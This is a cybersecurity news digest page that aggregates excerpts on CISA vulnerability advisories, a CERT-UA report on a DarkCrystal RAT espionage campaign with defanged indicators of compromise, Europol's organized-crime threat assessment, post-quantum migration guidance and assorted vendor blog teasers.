CVE-2024-50696: a 9.5-rated Download of Code Without Integrity Check vulnerability Sungrow has released updated versions of the affected firmware. Users are urged to apply version WINET-SV200.001.00.P028 or higher and update their iSolarCloud Android App to the latest version. The iSolarCloud has been updated and requires no further user action. A second CISA advisory flagged by Cyble involves two 8.5 severity vulnerabilities affecting older versions of Philips IntelliSpace Cardiovascular (ISCV), a critical platform for managing and analyzing cardiovascular imaging data that assist clinicians in diagnosing and treating heart conditions. An Improper Authentication Vulnerability (CVE-2025-2230) could allow unauthorized users to access sensitive patient data, compromising the confidentiality and integrity of medical records. Additionally, using Weak Credentials (CVE-2025-2229) makes the system more susceptible to brute-force attacks and credential exploitation. “These weaknesses not only endanger patient privacy but also disrupt critical diagnostic workflows, potentially impacting patient care,” Cyble said in its report to clients. CISA noted that successfully exploiting the vulnerabilities “could allow an attacker to replay the session of the logged-in ISCV user and gain access to patient records.” While the ISCV vulnerability findings are new, they were fixed some time ago but may still be present in older systems. CVE-2025-2229 was resolved in ISCV 4.2 build 20589, released in May 2019, and CVE-2025-2230 was resolved in ISCV 5.2, which was released in September 2020. Recommendations for Mitigating ICS Vulnerabilities Cyble recommends the following controls for mitigating ICS vulnerabilities and improving the overall security of ICS systems. These measures include: Staying on top of security advisories and patch alerts issued by vendors and regulatory bodies like CISA. A risk-based approach to vulnerability management reduces the risk of exploitation. Implementing a Zero-Trust Policy to minimize exposure and ensure that all internal and external network traffic is scrutinized and validated. Developing a comprehensive patch management strategy that covers inventory management, patch assessment, testing, deployment, and verification. Automating these processes can help maintain consistency and improve efficiency. Network segmentation can limit an attacker’s potential damage and prevent lateral movement across networks. This is particularly important for securing critical ICS assets, which should not be exposed to the Internet if possible and protected adequately if remote access is essential. Conducting regular vulnerability assessments and penetration testing to identify security gaps that might be exploited by threat actors. Establishing and maintaining an incident response plan and ensuring that it is tested and updated regularly to adapt to the latest threats. All employees, especially those working with Operational Technology (OT) systems, should be required to undergo ongoing cybersecurity training programs. The training should focus on recognizing phishing attempts, following authentication procedures, and understanding the importance of cybersecurity practices in day-to-day operations. Conclusion These vulnerabilities highlight the dangers that critical infrastructure system vulnerabilities can pose to critical sectors like energy, healthcare, and other sensitive environments. Users should heed the advice of CISA, vendors, and security researchers and ensure that these critical systems are patched and properly protected. Regardless of the sector, staying on top of ICS vulnerabilities and applying good cybersecurity hygiene and controls can limit risk. This includes limiting internet exposure and properly protecting assets that must be accessed remotely. To access the full report on ICS vulnerabilities observed by Cyble, along with additional insights and details, click here. By adopting a comprehensive, multi-layered security approach that includes effective vulnerability management, timely patching, and ongoing employee training, organizations can reduce their exposure to cyber threats. With the right tools and intelligence, such as those offered by Cyble, critical infrastructure can be better protected, ensuring its resilience and security in an increasingly complex cyber landscape. The post ICS Vulnerability Report: Solar Energy, Cardiology Fixes Urged by Cyble appeared first on Cyble.

by CYBLE

The report contains statistics on malware, initial infection vectors and other threats to industrial automation systems in Q4 2024.

by Securelist

In late 2024, Darktrace detected unusual activity linked to Cyberhaven''s Chrome browser extension. Read more about Darktrace’s investigation here.

by Darktrace

Check out key findings and insights from the “Tenable Cloud AI Risk Report 2025.” Plus, get fresh guidance on how to transition to quantum-resistant cryptography. In addition, find out how AI is radically transforming cyber crime. And get the latest on open source software security; cyber scams; and IoT security.Dive into six things that are top of mind for the week ending March 21.1 - Tenable: Orgs using AI in the cloud face thorny cyber risksUsing AI tools in cloud environments? Make sure your organization is aware of and prepared for the complex cybersecurity risks that emerge when you mix AI and the cloud.That’s a key message from the “Tenable Cloud AI Risk Report 2025,” released this week and based on a telemetry analysis of public cloud and enterprise workloads scanned through Tenable products.“Cloud security measures must evolve to meet the new challenges of AI and find the delicate balance between protecting against complex attacks on AI data and enabling organizations to achieve responsible AI innovation,” Liat Hayun, Tenable’s VP of Research and Product Management for Cloud Security, said in a statement.Key findings from the report include:70% of cloud workloads with AI software installed have at least one critical vulnerability, compared with 50% of cloud workloads that don’t have AI software installed.77% of organizations have the overprivileged default Compute Engine service account configured in Google Vertex AI Notebooks – which puts all services built on this default Compute Engine at risk.91% of organizations using Amazon Sagemaker have the risky default of root access in at least one notebook instance, which could grant attackers unauthorized access if compromised. These are some of the report''s risk mitigation recommendations:Take a contextual approach for revealing exposures across your cloud infrastructure, identities, data, workloads and AI tools. Classify all AI components linked to business-critical assets as sensitive, and include AI tools and data in your asset inventory, scanning them continuously. Keep current on emerging AI regulations and guidelines, and stay compliant by mapping key cloud-based AI data stores and implementing required access controls.  Apply cloud providers'' recommendations for their AI services, but be aware that default settings are commonly insecure and guidance is still evolving. Prevent unauthorized or overprivileged access to cloud-based AI models and data stores. Prioritize vulnerability remediation by understanding which CVEs pose the greatest risk to your organization. To get more information, check out:The full “Tenable Cloud AI Risk Report 2025”The webinar “2025 Cloud AI Risk Report: Helping You Build More Secure AI Models in the Cloud” on April 17, 2025 at 2 pm EDTThe video “Why firms need ‘exposure management’ for cloud security”2 - U.K.’s cyber agency offers post-quantum migration guidanceIs your organization planning to adopt cryptography that can resist attacks from future quantum computers? If so, you might want to check out fresh guidance about this topic.This week, the U.K. National Cyber Security Centre (NCSC) published “Timelines for migration to post-quantum (PQC) cryptography,” a white paper aimed at helping organizations plan their migration to quantum-resistant cryptography.“Migration to PQC can be viewed as any large technology transition. In the guidance, we describe the key steps in such a transition, and illustrate some of the cryptography and PQC-specific elements required at each stage of the programme,” reads a companion blog. At a high-level, these are the three main key milestones proposed by the NCSC:By 2028Define the organization’s migration goals.Assess which services and infrastructure need to have their cryptography upgraded to PQC.Draft an initial migration plan that includes, for example, the highest priority migration steps; the necessary investment; and what you’ll need from your suppliers.By 2031Execute the first, most important PQC migration steps.Refine the PQC migration plan to ensure the roadmap will be fulfilled.Ensure your infrastructure is ready to support PQC.By 2035Complete your PQC migration.The need to migrate to PQC stems from the ability quantum computers will have to decrypt data protected with today’s public-key cryptographic algorithms. These powerful quantum computers are expected to become generally available at some point between 2030 and 2040.The U.S. National Institute of Standards and Technology (NIST) last year released three quantum-resistant algorithm standards that are ready to be adopted. A fourth one is slated for release next year, and a fifth one, announced last week, should be available in 2027.For more information about how to protect your organization against the quantum computing cyberthreat:“How to prepare for a secure post-quantum future” (TechTarget)“Moody’s sounds alarm on quantum computing risk, as transition to PQC ‘will be long and costly’” (Industrial Cyber)“Companies Prepare to Fight Quantum Hackers” (The Wall Street Journal)“US unveils new tools to withstand encryption-breaking quantum. Here''s what experts are saying” (World Economic Forum)“Quantum is coming — and bringing new cybersecurity threats with it” (KPMG)“Quantum and the Threat to Encryption” (SecurityWeek)3 - Europol: AI is transforming organized crimeCriminals are enthusiastically embracing AI, which helps them accelerate their malicious activities and operate more effectively.So said Europol in its report “European Union Serious and Organised Crime Threat Assessment 2025: The changing DNA of serious and organised crime,” published this week.“As AI-driven systems … become more advanced and user-friendly, criminal networks are increasingly leveraging their capabilities across a wide spectrum of crimes,” the report reads.According to Europol, AI is “fundamentally reshaping” crime by:Drastically lowering the barriers to entry for digital crimes by allowing crooks to, for example, craft phishing messages in multiple languages, precisely target victims and craft sophisticated malwareAllowing fraudsters to create sophisticated synthetic media, such as voice cloning and video deepfakes, to dupe victims, impersonate people and carry out blackmailMaking crooks more effective by, for example, automating attacks, expanding their scope and scale, and bypassing security controls – all with fewer resources.“To counter the growing threat of AI-enabled crime, policymakers, law enforcement agencies and the technology sector must collaborate to develop robust safeguards, consistent regulations and advanced detection tools,” the report reads.For more information about how cybercriminals are leveraging AI:“How AI is making phishing attacks more dangerous” (TechTarget)“How AI agents help hackers steal your confidential data - and what to do about it” (ZDNet)“How cyber criminals are using artificial intelligence (AI) for online threats” (Government of Canada)“The near-term impact of AI on the cyber threat” (U.K. NCSC)“FBI Warns of Increasing Threat of Cyber Criminals Utilizing Artificial Intelligence” (FBI) 4 - Groups call for IoT end-of-life disclosure lawManufacturers of internet-of-things (IoT) devices should be required by law to disclose the products they’re no longer supporting, so that customers are aware of the security risks those products pose.That’s the opinion of Consumer Reports, the Center for Democracy and Technology, the U.S. Public Interest Research Group and the Secure Resilient Future Foundation, which recently proposed a model bill called the “Connected Consumer Products End of Life Disclosure Act.”The bill would require IoT manufacturers and internet service providers (ISPs) to provide “clear and timely” information about their connected devices’ support lifecycles. “The proliferation of IoT devices in homes and businesses has created a significant security challenge. When these devices reach their end of life and no longer receive software and security updates, they become vulnerable to exploitation by malicious actors,” reads a joint statement from the groups.Specifically, the groups want the law to require IoT manufacturers to:Clearly disclose for how long they’ll provide security and software updates, and to offer this support for a reasonable amount of time.Proactively alert customers when their devices are approaching end-of-life status and offer appropriate guidance.Offer details about features that will become inactive, and about potential vulnerabilities and security risks resulting from end-of-life status.Moreover, the proposed model law would also put the onus on ISPs to remove from customers’ homes any devices they provided, such as routers, once those devices reach end-of-life status.For more information about IoT and operational technology (OT) security, check out these Tenable resources:“How To Secure All of Your Assets - IT, OT and IoT - With an Exposure Management Platform” (blog)“How To Secure All of Your Assets - IT, OT and IoT - With an Exposure Management Platform: The Importance of Contextual Prioritization” (blog)“How To Secure Your IT, OT and IoT Assets With an Exposure Management Platform: Complete Visibility with Asset Inventory and Discovery” (blog)“The Invisible Bridge: Recognizing The Risk Posed by Interconnected IT/OT/IoT Environments” (on-demand webinar)“How to Unlock Advanced IoT Visibility for Cyber-Physical Systems” (blog)“Unlock advanced IoT visibility to better secure your OT environment” (on-demand webinar)5 - Report: Open source community must prep better for EU’s CRA law complianceOpen-source software manufacturers, project stewards and developers need to beef up on their knowledge of the European Union’s Cyber Resilience Act (CRA), a landmark cybersecurity law whose enforcement is expected to begin in late 2027.That’s the main takeaway from the new report “Unaware and Uncertain: The Stark Realities of ‘Cyber Resilience Act’ Readiness in Open Source” from the Linux Foundation and the Open Source Security Foundation.“This report highlights significant knowledge gaps and key strategies to help organizations meet regulatory obligations outlined in the CRA regarding secure software development, while preserving the collaborative and decentralized nature of open source,” Steve Fernandez, OpenSSF’s General Manager, said in a statement.  The report surveyed 685 respondents, most of them software developers, IT professionals and security professionals. It found that CRA awareness is low, with 62% of respondents saying they’re either “not familiar at all” or “slightly familiar” with the law. Even many respondents who are familiar with the CRA still lack a comprehensive grasp of its scope. For example, 42% of respondents haven’t determined if the law applies to them, and almost 60% aren’t aware of the non-compliance penalties. Furthermore, only 28% correctly said full CRA compliance begins in 2027.Here are some key recommendations from the report:Manufacturers need to adopt a more proactive approach to securing their open source software dependencies by, for example, developing internal security controls and establishing formal contribution processes.Stewards should help “scale and standardize” cybersecurity practices and processes throughout the open source ecosystem. The CRA defines stewards as industry organizations, such as the OpenSSF, that support the development of open source software for commercial use.Regulatory agencies should provide clear guidance around the CRA so that open source players are clear about the scope and requirements of the law.The Linux Foundation also released a complementary report titled “Pathways to Cybersecurity Best Practices in Open Source” that features cybersecurity best practices from three of the organization’s projects.The CRA outlines cybersecurity requirements for the design, development, production and lifecycle maintenance of digital products – both hardware and software – including IoT wares such as connected cars.For example, the CRA specifies a number of “essential cybersecurity requirements” for these products, including that they:Don’t ship with known exploitable vulnerabilitiesHave a “secure by default” configurationCan fix their vulnerabilities via automatic software updatesOffer access protection via control mechanisms, such as authenticationProtect the data they store, transmit and processFor more information and analysis about the EU’s Cyber Resilience Act:“Cyber Resilience Act Requirements Standards Mapping” (ENISA)“The Cyber Resilience Act, an Accidental European Alien Torts Statute?” (Lawfare)“EU Cybersecurity Regulation Adopted, Impacts Connected Products” (National Law Review)“Open source foundations unite on common standards for EU’s Cyber Resilience Act” (TechCrunch)“The Cyber Resilience Act: A New Era for Mobile App Developers” (DevOps.com)VIDEOThe EU Cyber Resilience Act: A New Era for Business Engagement in Open Source Software (Linux Foundation)6 - FBI: Beware of malicious file-converter toolsCyber fraudsters are luring victims by offering free online tools for converting files into different formats, according to the U.S. Federal Bureau of Investigation.While the tools work as advertised, they also perform malicious actions in the background, such as infecting the converted file with malware or stealing personal data from it, including banking information and Social Security numbers.  In other scheme variations, the tools may offer to combine files into a single one – such as by consolidating multiple photos into one PDF file – or they may claim to be an MP3 or MP4 downloader.“Unfortunately, many victims don’t realize they have been infected by malware until it’s too late, and their computer is infected with ransomware or their identity has been stolen,” reads the alert from the FBI’s Denver office.The FBI recommends thinking twice about using free online tools that offer these functionalities and scanning all files you receive with anti-virus software.

by Tenable

The Government Computer Emergency Response Team (CERT-UA) issued an important warning about a series of targeted cyberattacks aimed at employees within Ukraine''s defense-industrial complex and members of the Armed Forces. These attacks have been tracked under the identifier UAC-0200, marking a concerning escalation in espionage activities leveraging the DarkCrystal RAT (DCRAT). According to CERT-UA, the attacks, which have been ongoing since at least the summer of 2024, employ sophisticated tactics to gain unauthorized access to sensitive information. One of the primary techniques identified involves the use of the Signal messaging app, where malicious actors have been spreading messages disguised as meeting reports.  Also Read: UAC-0173 Resumes Cyberattacks Against Ukrainian Notary Offices Using DARKCRYSTALRAT Malware These deceptive messages often contain compressed archive files, which include a PDF document and an executable file, classified as DarkTortilla. The DarkTortilla file serves as a cryptor/loader designed to decrypt and launch the DarkCrystal RAT (DCRAT) on the infected system. How the DarkCrystal RAT Works DarkCrystal RAT (DCRAT) is a powerful remote access tool that allows cybercriminals to control infected systems from a distance. Once installed, it grants the attackers complete control over the victim''s device, enabling them to exfiltrate sensitive information, manipulate data, and even deploy additional malicious payloads. The use of DarkTortilla as a loader is particularly concerning as it hides the malicious intent behind a seemingly innocuous file, making it more difficult for users to detect.  The CERT-UA team further emphasized that starting in February 2025, the focus of these attacks shifted toward topics related to unmanned aerial vehicles (UAVs) and electronic warfare systems. This shift suggests that the attackers are now targeting more specific defense technologies, likely to gather intelligence on Ukraine’s military capabilities. Leveraging Social Engineering Tactics for Cyberattacks  One of the key features of these cyberattacks is the use of social engineering techniques to manipulate victims into opening malicious attachments. The use of Signal, a popular messaging platform, broadens the attack surface, providing cybercriminals with a relatively unregulated channel through which to spread their payloads. Messages often appear to come from trusted sources, such as colleagues or business partners, whose accounts have already been compromised. This method of attack makes it harder for traditional security systems to detect and block malicious activity, as the attackers exploit legitimate communication channels to deliver their payloads. CERT-UA’s Ongoing Monitoring and Response  The CERT-UA team has been closely monitoring these threats, and they urge all individuals working in the defense sector to remain vigilant. In the event of receiving suspicious messages or files, CERT-UA encourages immediate reporting to the authorities through all available means.  As part of its ongoing efforts, CERT-UA has released a list of indicators of compromise (IOCs) to help organizations identify and respond to the threat. These IOCs include specific file hashes and network addresses associated with the attack.   The listed files include archive files such as “Звіт 10.03.25.rar” and “Наказ 17.02.2025.pdf,” which contain the malicious executables linked to the DarkCrystal RAT.  The identified network addresses linked to the attacks include:  45[.]130.214.237  62[.]60.235.190  87[.]249.50.64  217[.]25.91.61  83[.]147.253.138  Additionally, there are several URLs associated with the compromised network infrastructure, which are used to facilitate the attack and maintain communication between the infected systems and the attackers'' servers.  The UAC-0200 attack campaign highlights the growing cybersecurity risks faced by Ukraine''s defense sector. The use of sophisticated malware like DarkCrystal RAT (DCRAT) highlights the need for stronger security, especially against social engineering tactics that exploit communication tools such as Signal. As cybercriminals become more advanced, constant vigilance and proactive cybersecurity measures are essential.  CERT-UA’s ongoing monitoring plays a crucial role in managing these threats, but individuals must also stay alert and report suspicious activity. With cyberattacks becoming more advanced, it’s vital for both government and private sectors to collaborate in strengthening defenses to protect Ukraine’s defense infrastructure and national security. 

by The Cyber Express

Disable or Modify Cloud Firewall is a defense evasion technique that adversaries use to manipulate cloud-based firewall configurations to bypass security controls and enable malicious activity. Cloud firewalls, often implemented as security groups, network access control lists (NACLs), or virtual firewall appliances, are designed to regulate network traffic, prevent unauthorized access, and enforce segmentation within cloud environments. By disabling or modifying these protections, attackers can create unauthorized pathways for lateral movement, data exfiltration, and command-and-control (C2) communication.

by Picus Security

A compromise of the GitHub action tj-actions/changed-files highlights how attackers could exploit vulnerabilities in third-party actions to compromise supply chains. The post GitHub Actions Supply Chain Attack: A Targeted Attack on Coinbase Expanded to the Widespread tj-actions/changed-files Incident: Threat Assessment (Updated 3/21) appeared first on Unit 42.

by Palo Alto Networks - Unit42

Jasmin Ransomware - SQL Injection Login Bypass

by Exploit DB

<p>Play We’re excited to share some big news: Trimarc Security is now fully operating under TrustedSec! This marks a significant step forward in our mission to provide real-world security guidance to help our partners…</p>

by TrustedSec

The order accused DOGE of engaging in a ""fishing expedition"" at the federal agency.

by TechCrunch

YouTube videos promoting game cheats are being used to deliver a previously undocumented stealer malware called Arcane likely targeting Russian-speaking users. ""What''s intriguing about this malware is how much it collects,"" Kaspersky said in an analysis. ""It grabs account information from VPN and gaming clients, and all kinds of network utilities like ngrok, Playit, Cyberduck, FileZilla, and

by The Hacker News

North Korea is reportedly launching a new cybersecurity unit called Research Center 227 within its intelligence agency Reconnaissance General Bureau (RGB).

by TechCrunch

A massive cybercrime network known as "VexTrio" is using thousands of compromised WordPress sites to funnel traffic through a complex redirection scheme.

by Dark Reading

The Amazon Nova AI Challenge puts student research to the test and aims to bring a new perspective to challenges arising from the increase in AI-assisted software development.

by Dark Reading

Veeam has released security updates to address a critical security flaw impacting its Backup & Replication software that could lead to remote code execution. The vulnerability, tracked as CVE-2025-23120, carries a CVSS score of 9.9 out of 10.0. It affects 12.3.0.310 and all earlier version 12 builds. ""A vulnerability allowing remote code execution (RCE) by authenticated domain users,"" the

by The Hacker News

Cybersecurity vendors say threat actors'' abuse of traffic distribution systems (TDS) is becoming more complex and sophisticated — and much harder to detect and block.

by Dark Reading

The phishing campaign for valuable Google accounts continues with a new twist, going after the customers of a SasS platform.

by Malwarebytes Labs

In this week’s Threat Source newsletter, William pitches a fun comparison between baseball legend Ichiro Suzuki and the unsung heroes of information security, highlights newly released UAT-5918 research, and shares an exciting new Talos video.

by Cisco Talos Blog

The HTB CDSA and HTB CPTS certifications have been officially added to the ACS’s list of cybersecurity professional certificates.

by Hack The Box Blog

Not all authentication is equal to the task in 2025, but there is a best choice within reach

by Sophos News

Cybersecurity isn''t just another checkbox on your business agenda. It''s a fundamental pillar of survival. As organizations increasingly migrate their operations to the cloud, understanding how to protect your digital assets becomes crucial. The shared responsibility model, exemplified through Microsoft 365''s approach, offers a framework for comprehending and implementing effective cybersecurity

by The Hacker News

The UNC-200 threat group, active since last summer, has been utilizing the Signal messaging app to social engineer targets into downloading an infostealing remote access Trojan.

by Dark Reading

In Part 1 of Fort Knox for Your Data: How Elasticsearch X-Pack Locks Down Your Cluster, we uncovered the dangers of running Elasticsearch with X-Pack disabled and thus, highlighting the ease with which attackers can exploit unauthenticated endpoints.

by SpiderLabs Blog

The governments of Australia, Canada, Cyprus, Denmark, Israel, and Singapore are likely customers of spyware developed by Israeli company Paragon Solutions, according to a new report from The Citizen Lab. Paragon, founded in 2019 by Ehud Barak and Ehud Schneorson, is the maker of a surveillance tool called Graphite that''s capable of harvesting sensitive data from instant messaging applications

by The Hacker News

According to Barracuda Network’s Evolving Landscape of the MSP 2024 report, 38% of managed service providers (MSPs) offer security awareness training (SAT). However, experts say that the percentage should be much higher.

by Barracuda

Experts are warning about the proliferating market for targeted spyware and espionage. Why should we be concerned?

by Malwarebytes Labs

Threat intelligence startup GreyNoise says it has observed a ‘notable resurgence’ in attack activity

by TechCrunch

GenAI is replacing citizen development. Here''s why that''s a good thing.

by ITPro Today

Regulatory compliance is no longer just a concern for large enterprises. Small and mid-sized businesses (SMBs) are increasingly subject to strict data protection and security regulations, such as HIPAA, PCI-DSS, CMMC, GDPR, and the FTC Safeguards Rule. However, many SMBs struggle to maintain compliance due to limited IT resources, evolving regulatory requirements, and complex security challenges

by The Hacker News

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a high-severity security flaw impacting NAKIVO Backup & Replication software to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. The vulnerability in question is CVE-2024-48248 (CVSS score: 8.6), an absolute path traversal bug that could allow an unauthenticated attacker to

by The Hacker News

U.S. Cyber Command concluded the first phase of its 11th annual command exercise, Cyber Guard, on March 18, 2025. The U.S. Cyber Command Cyber Guard exercise, in coordination with the Joint Staff, is part of a larger joint force exercise series designed to simulate real-world scenarios, to enable participants to practice internal and external staff processes for total force integration.

by U.S. Cyber Command News

The UK’s National Cyber Security Centre (NCSC) has released detailed guidance on the transition to post-quantum cryptography (PQC), setting key target dates for organizations to complete their migration. The move is aimed at mitigating the future risks posed by quantum computers, which could render today’s encryption methods obsolete. Quantum cryptography by 2035 The NCSC’s recommendations, … The post UK Sets Deadline for Quantum Cryptography Migration to 2035 appeared first on CyberInsider.

by Cyber Insider

Our latest Phishing Threat Trends Report explores the evolving phishing landscape in 2025, from renewed tactics to emerging attack techniques.

by KnowBe4

There are thousands of people worldwide trying to scam you, hoping they can make you a victim, steal your money, and harm you in some way. While some of it is done by individuals or small gangs of people, a lot of it happens on an industrialized scale.

by KnowBe4

Threat actors are abusing Microsoft’s infrastructure to launch phishing attacks that can bypass security measures, according to researchers at Guardz.

by KnowBe4

One of the most concerning vulnerabilities in the new CISA catalog is CVE-2025-1316, which affects the Edimax IC-7100 IP Camera. This vulnerability, identified on March 4, 2025, is an OS Command Injection Vulnerability that allows attackers to execute arbitrary commands on the device remotely.   The Edimax IC-7100 does not properly neutralize special characters used in OS commands, leaving it open to exploitation. Malicious actors can craft specific requests to inject malicious code into the camera’s operating system, leading to remote code execution and unauthorized access to the device.  The impact of this vulnerability is severe, as it enables attackers to gain control over the device, potentially accessing sensitive video surveillance data or compromising the network. A CVSS v4 score of 9.3 has been assigned to CVE-2025-1316, indicating the critical nature of the flaw.   CISA strongly recommends that organizations using Edimax IC-7100 IP Cameras take immediate action to mitigate the risk, including network isolation, the use of firewalls, and the deployment of Virtual Private Networks (VPNs) to protect control systems from external threats.  CVE-2024-48248: Absolute Path Traversal Vulnerability in NAKIVO Backup and Replication  Another serious vulnerability added to CISA’s catalog is CVE-2024-48248, a Traversal Vulnerability in NAKIVO Backup and Replication. This flaw, which was discovered in March 2025, allows attackers to exploit the application’s handling of file paths, enabling them to access unauthorized directories on the system. This vulnerability is a classic case of absolute path traversal, where attackers can manipulate file paths to navigate outside the expected directory structure, potentially reading sensitive files and compromising the system’s security.  The flaw affects all versions of NAKIVO Backup and Replication prior to the patch release, and its exploitation can lead to data leakage or loss, exposing critical backup information. CISA emphasizes the importance of applying patches and updating to the latest software versions to prevent potential breaches. Organizations are advised to ensure proper access controls are in place and to regularly audit their systems for vulnerabilities related to path traversal.  CVE-2017-12637: Directory Traversal Vulnerability in SAP NetWeaver  The third vulnerability on CISA’s list is CVE-2017-12637, a Directory Traversal Vulnerability found in SAP NetWeaver, a widely used enterprise resource planning (ERP) system. This flaw, which was originally published in August 2017, has resurfaced in the context of ongoing exploitation. The vulnerability allows attackers to access arbitrary files by manipulating file paths in a web application’s query string, a technique known as directory traversal.  In this case, the SAP NetWeaver Application Server Java 7.5 is vulnerable to exploitation via the UIUtilJavaScriptJS component. By sending specially crafted input that includes .. (dot dot) sequences, attackers can navigate outside the application’s root directory and access sensitive files on the underlying system. Exploiting this flaw can lead to the disclosure of confidential information, and in some cases, the ability to execute further attacks on the system.  CISA urges SAP NetWeaver users to immediately apply security patches to resolve this issue and recommends conducting thorough security reviews to prevent similar vulnerabilities from being overlooked in the future.  Conclusion   Addressing vulnerabilities such as CVE-2025-1316, CVE-2024-48248, and CVE-2017-12637 is important for protecting critical infrastructure and sensitive data from exploitation. Organizations must remain proactive in implementing mitigation strategies recommended by CISA, such as updating systems, securing access, and isolating vulnerable devices.   As the threat landscape evolves, the importance of leveraging advanced cybersecurity solutions cannot be overstated. Cyble, a leader in AI-driven cybersecurity, plays a crucial role in helping organizations stay protected from cyber adversaries. With its cutting-edge threat intelligence platforms, like Cyble Vision, Cyble empowers enterprises, government bodies, and law enforcement agencies to proactively detect and defend against cyber threats.  References  https://www.cisa.gov/news-events/alerts/2025/03/19/cisa-adds-three-known-exploited-vulnerabilities-catalog  https://www.cve.org/CVERecord?id=CVE-2025-1316  https://www.cve.org/CVERecord?id=CVE-2024-48248  https://www.cve.org/CVERecord?id=CVE-2017-12637  The post CISA Warns of Active Exploitation with Three New Vulnerabilities Added to KEV Catalog  appeared first on Cyble.

by CYBLE

Overview  The Europol released the EU-SOCTA 2025 report, which offers a comprehensive look into the complex dynamics shaping serious and organized crime across Europe.  Europol’s analysis provides insight into the increasing intersection of cybercriminal activities, hybrid threats, and the exploitation of emerging technologies. Criminals are rapidly adapting to digital advancements, using technology to expand their reach, enhance their capabilities, and evade law enforcement, the reports said.  Hybrid Threats: A Blurring of Crime and Conflict  Hybrid threats, which combine conventional criminal methods with advanced digital strategies, present significant risks. These tactics destabilize societies, exploit critical infrastructures, and create uncertainty.   Criminal organizations now leverage methods traditionally associated with state-backed actors, including disinformation campaigns, targeted cyberattacks, and manipulation of public opinion. By exploiting vulnerabilities of interconnected systems, these actors disrupt supply chains, compromise sensitive data, and manipulate information on a large scale.  The blending of state-backed espionage and organized crime blurs the line between geopolitical conflict and traditional crime, complicating attribution and response. The report stresses the need for closer collaboration between law enforcement, intelligence agencies, and cybersecurity experts to counter these multifaceted threats.  The Online Realm: A Breeding Ground for Organized Crime  Online platforms have become fertile grounds for organized crime. The digital economy offers anonymity and scalability, enabling criminals to engage in illegal activities with minimal physical risk. From trafficking illicit goods on the dark web to orchestrating complex cyberattacks, digital spaces facilitate sophisticated criminal networks.  The report notes the increasing use of encrypted communication platforms and private messaging applications, making monitoring and law enforcement efforts more challenging. These platforms are exploited to trade drugs, weapons, stolen data, and counterfeit products while facilitating human trafficking and exploitation.   Additionally, online forums and marketplaces distribute cybercriminal tools like malware, ransomware-as-a-service, and exploit kits.  Technology as an Accelerator: AI and Emerging Innovations  Artificial intelligence (AI) and machine learning (ML) have significantly accelerated the capabilities of organized crime. Cybercriminals use AI-driven tools to automate attacks, bypass security mechanisms, and enhance phishing techniques, Europol noted. Deepfake technology, used for impersonation and disinformation, poses risks to financial institutions, law enforcement, and political stability.  The report also warns of the misuse of AI for predictive policing, biometric spoofing, and large-scale data analysis to exploit vulnerabilities. Criminals use AI to analyze stolen data sets, identify high-value targets, and launch precision-based attacks, increasing their success rates.  The Financial Side: Money Laundering and Criminal Finances  Money laundering remains a critical aspect of organized crime, with criminals employing sophisticated techniques to conceal illicit gains. Cryptocurrencies and digital assets are popular for money laundering due to their pseudo-anonymity and the complexity of tracing transactions across multiple blockchain networks.  The report identifies the misuse of virtual asset service providers (VASPs) for laundering money. Criminals utilize decentralized finance (DeFi) platforms to move illicit funds quickly, exploiting the lack of regulation and oversight. Shell companies and offshore accounts obscure the origins of criminal proceeds, challenging financial institutions and regulators.  Cyberattacks and Online Fraud: Old, Yet New Dimensions of Crime  Cyberattacks and online fraud have evolved from isolated incidents to well-coordinated, large-scale operations. Ransomware attacks, business email compromise (BEC), and phishing schemes increasingly target critical infrastructures, healthcare institutions, and multinational corporations.  The report outlines the growth of ransomware-as-a-service (RaaS), where organized crime groups provide malware to affiliates, sharing profits from successful attacks. Cybercriminals exploit supply chain vulnerabilities, infiltrating service providers to compromise multiple targets simultaneously.  Online fraud schemes like investment scams, identity theft, and credit card fraud have become more sophisticated. Cybercriminals use stolen data from breaches to create synthetic identities, making detection more difficult, Europol said.  Strengthening Resilience Against Evolving Threats  The EU-SOCTA 2025 report shows the need for a coordinated, multi-agency approach to combat these evolving threats. Enhanced collaboration between law enforcement, the private sector, cybersecurity professionals, and financial institutions is essential. Training and capacity-building for digital forensics, incident response, and intelligence analysis are crucial to adapting to the dynamic threat landscape.  Efforts to implement stricter regulatory measures for cryptocurrencies, strengthen anti-money laundering (AML) frameworks, and enhance threat intelligence sharing across borders are vital steps toward countering organized crime.  Public awareness campaigns and initiatives to educate businesses and individuals about cybersecurity best practices are equally important.  As the convergence of technology and crime continues, proactive measures and international cooperation are needed to mitigate the risks posed by hybrid threats and sophisticated cybercriminal networks. The EU-SOCTA 2025 report is a crucial resource for policymakers, security practitioners, and businesses seeking to navigate this increasingly complex security environment.  References:  https://www.europol.europa.eu/media-press/newsroom/news/launch-of-eu-serious-and-organised-crime-threat-assessment-2025https://www.europol.europa.eu/cms/sites/default/files/documents/EU-SOCTA-2025.pdf  The post Hybrid Threats and AI Form the DNA of EU’s Organized Threat Landscape in 2025: Europol  appeared first on Cyble.

by CYBLE

I’ve been a web application pentester for a while now and over the years must have found hundreds of cross-site scripting (XSS) vulnerabilities.1 Cross-site scripting is a notoriously difficult problem […] The post Canary in the Code: Alert()-ing on XSS Exploits appeared first on Black Hills Information Security.

by Black Hills Information Security

Forrester Research has recognized Cloudflare as a Leader in its The Forrester Wave™: Web Application Firewall Solutions, Q1 2025 report.

by Cloudflare

Answer: Nope. But let''s look at the trends — because they matter for security.

by Dark Reading

Validate the effectiveness of security controls with NetSPI''s Breach and Attack Simulation as a Service. Simulate real-world attacks, benchmark detection coverage, and improve defenses. The post Redefining Breach and Attack Simulation (BAS) with BAS as a Service appeared first on NetSPI.

by NetSPI

Our zLabs team dives into why rooting and jailbreaking is a significant threat for enterprises and much more. The post Catch Me If You Can: Rooting Tools vs The Mobile Security Industry appeared first on Zimperium.

by Zimperium

HP''s 8000 Series enterprise and commercial printers, which include Color LaserJet Enterprise MFP 8801, Mono MFP 8601, and LaserJet Pro Mono SFP 8501, will feature new quantum ASICs and endpoint controllers to protect them from future quantum attacks.

by Dark Reading

A new study reveals that thousands of Android apps covertly collect location data using Bluetooth and WiFi beacons, allowing continuous tracking and profiling of users without explicit consent. Researchers found that 86% of analyzed apps collect sensitive data, including device identifiers, GPS coordinates, and WiFi scan results, often circumventing Android’s privacy controls. The hidden tracking … The post Android Apps Use Bluetooth and WiFi Scanning to Track Users Without GPS appeared first on CyberInsider.

by Cyber Insider

Cloudflare’s first AI agent, Cloudy, helps make complicated configurations easy to understand for Cloudflare administrators.

by Cloudflare

